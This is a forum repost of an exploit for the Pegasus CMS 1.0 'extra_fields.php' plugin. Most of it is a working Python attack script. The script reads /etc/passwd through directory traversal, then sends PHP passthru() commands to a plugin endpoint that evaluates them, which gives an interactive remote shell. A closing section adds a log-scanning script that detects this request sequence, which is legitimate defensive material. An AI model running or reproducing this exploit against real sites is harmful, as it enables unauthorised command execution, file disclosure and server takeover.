Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution

18-03-2019 11:40, #1, posted by Kacamax (Member)
# Exploit Title: Pegasus extra_fields.php Plugin Remote Code Execution
# Date: 14 March 2019
# Exploit Author: R3zk0n
# Vendor Homepage: https://www.wisdom.com.au/web/pegasus-cms
# Software Link: N/A
# Version: 1.0
# Tested on: Linux
# CVE : N/A
Pegasus CMS is vulnerable to remote code execution through the way its "extra_fields.php" plugin works.
For a more detailed walkthrough of running code remotely through the plugin, see the address at this link.

Exploits:

Code:
#Eval is secure.. not really.
# These Greetz to people who are smart, Wireghoul, Nano, Silverly, m3mantra, and leostat. and z3al
# Python 2 script (print statements, raw_input); needs the 'requests' package.
import sys
import requests

# Silence urllib3's certificate warnings for the https request in dir_Trav()
requests.packages.urllib3.disable_warnings()

banner = '''
Welcome to the DANGER ZONE.

Chimeria Exploit.
pegausCMS Exploit's.
'''


print banner


raw_url = raw_input("Please enter a domain name: \n")

# Browser-like headers reused by the requests below
GET_HEADERS = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Connection": "close", "Cache-Control": "max-age=0"}
POST_HEADERS = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
# The plugin endpoint whose 'action' parameter ends up in eval()
exploit_url = "http://www." + raw_url + "/file/includes/plugins/extra_fields/submit.php"


def dir_Trav(raw_url):
    # Reads /etc/passwd through test.cgi's 'filename' parameter to check for directory traversal
    print "Checking for directory traversal..\n"
    dir_list = requests.get("https://www." + raw_url + "/file/includes/template/inc/test.cgi?&filename=/../../../../../../../../etc/passwd", headers=GET_HEADERS)
    print dir_list.content
    return


print "Trying to execute directory traversal"
dir_Trav(raw_url)
r = requests.get("http://" + raw_url)
print "Checking Status code: %s" % r.status_code
if r.status_code == 200:
    print "Connected"
    print "Checking is using vulnerable CMS."
    # A 200 from the globalFields plugin is used as the CMS fingerprint
    vuln = "http://" + raw_url + "/file/includes/plugins/globalFields/submit.php"
    b = requests.get(vuln)
    print "Checking CMS Status: %s " % b.status_code
    if b.status_code == 200:
        print "Seems exploitable.. Lets try to list the files!"
        print raw_url
        # PHP code is sent as the 'action' parameter; the plugin eval()s it
        list_files = requests.post(exploit_url, headers=POST_HEADERS, data={"action": 'passthru("ls -lah");exit;phpinfo'})
        print list_files.content
        status = list_files.status_code
        while status == 200:
            try:
                ShellCheck = raw_input("Shell>").strip()
                Shell = requests.post(exploit_url, headers=POST_HEADERS, data={"action": 'passthru("{}");exit;phpinfo'.format(ShellCheck)})
                print Shell.content
                if ShellCheck == "exit":
                    sys.exit(0)
            except KeyboardInterrupt:
                print "You exited, bye"
                sys.exit(0)
    else:
        print "Connected but does not seem exploitable. \n"
        print "Bye!!!!!!!!!! \n"
else:
    print "Not connected"
Exploit URL: https://www.exploit-db.com/exploits/46542
User signature
"When a question is asked, try to get to know the one asking rather than the question"
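From the defender's side, the script above leaves a recognisable trace in the web server's access log: a GET to test.cgi with a `../` filename, a GET to the globalFields submit.php as a CMS fingerprint, and then POSTs to the extra_fields submit.php. The following is an added detection example (not part of the original post or of Pegasus CMS) that scans Apache/nginx "combined" log lines for that sequence. It assumes the combined log format, and the sample log lines are constructed. Note the caveat in the code: the access log does not record the POST body, so the `action` payload itself is invisible and the endpoint, method and status are the only signal.

```python
"""Flag access-log entries matching the probe/exploit sequence of the Pegasus CMS
extra_fields.php exploit.  Added example, not part of the original post.
Assumes Apache/nginx "combined" log format; the sample lines are constructed."""
import re
from urllib.parse import unquote

# Endpoints taken from the exploit script above.
TRAVERSAL_ENDPOINT = "/file/includes/template/inc/test.cgi"
FINGERPRINT_ENDPOINT = "/file/includes/plugins/globalFields/submit.php"
RCE_ENDPOINT = "/file/includes/plugins/extra_fields/submit.php"

# Assumed "combined" layout: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample log (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Mar/2019:10:15:02 +0000] "GET /file/includes/template/inc/test.cgi?&filename=/../../../../../../../../etc/passwd HTTP/1.1" 200 1842 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"',
    '203.0.113.7 - - [14/Mar/2019:10:15:03 +0000] "GET /file/includes/plugins/globalFields/submit.php HTTP/1.1" 200 0 "-" "python-requests/2.21.0"',
    '203.0.113.7 - - [14/Mar/2019:10:15:04 +0000] "POST /file/includes/plugins/extra_fields/submit.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"',
    '198.51.100.22 - - [14/Mar/2019:10:16:10 +0000] "GET /index.php?page=news HTTP/1.1" 200 7310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '198.51.100.9 - - [14/Mar/2019:10:20:41 +0000] "POST /file/includes/plugins/extra_fields/submit.php HTTP/1.1" 404 221 "-" "curl/7.64.0"',
]


def classify(line):
    """Return a finding dict for one log line, or None if it is not of interest."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method = m.group("method")
    status = int(m.group("status"))
    path = unquote(m.group("path"))  # also catches %2e%2e%2f-style encoded traversal
    base = path.split("?", 1)[0]
    tags = []
    if base.endswith(TRAVERSAL_ENDPOINT) and ("../" in path or "/etc/passwd" in path):
        tags.append("traversal-probe")
    if base.endswith(FINGERPRINT_ENDPOINT) and method == "GET":
        tags.append("plugin-fingerprint")
    if base.endswith(RCE_ENDPOINT) and method == "POST":
        # The POST body (the 'action' payload) is not in the access log, so the
        # endpoint and method are the only signal; a 200 means the plugin answered.
        tags.append("rce-endpoint-post-200" if status == 200 else "rce-endpoint-post")
    if not tags:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "method": method,
            "path": path, "status": status, "tags": tags}


def scan(lines):
    """Classify every line and drop the uninteresting ones."""
    return [f for f in (classify(l) for l in lines) if f]


def correlate(findings):
    """Group tags per source IP; an IP that fingerprinted the plugin and then
    POSTed to the RCE endpoint with a 200 reproduces the exploit's own sequence."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], set()).update(f["tags"])
    return {ip: sorted(tags) for ip, tags in by_ip.items()
            if "rce-endpoint-post-200" in tags and "plugin-fingerprint" in tags}


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["method"], f["status"], ",".join(f["tags"]), f["path"])
    print("source IPs reproducing the exploit sequence:", correlate(scan(SAMPLE_LOG)))
```

A lone POST to the extra_fields endpoint (the 404 from 198.51.100.9 in the sample) is still reported by `scan()` but not by `correlate()`, which only names sources that completed the fingerprint-then-POST-200 sequence; tune that threshold to the noise level of the site. Because the body is not logged, confirming what was executed requires the PHP or application logs, or a WAF/reverse proxy that records request bodies.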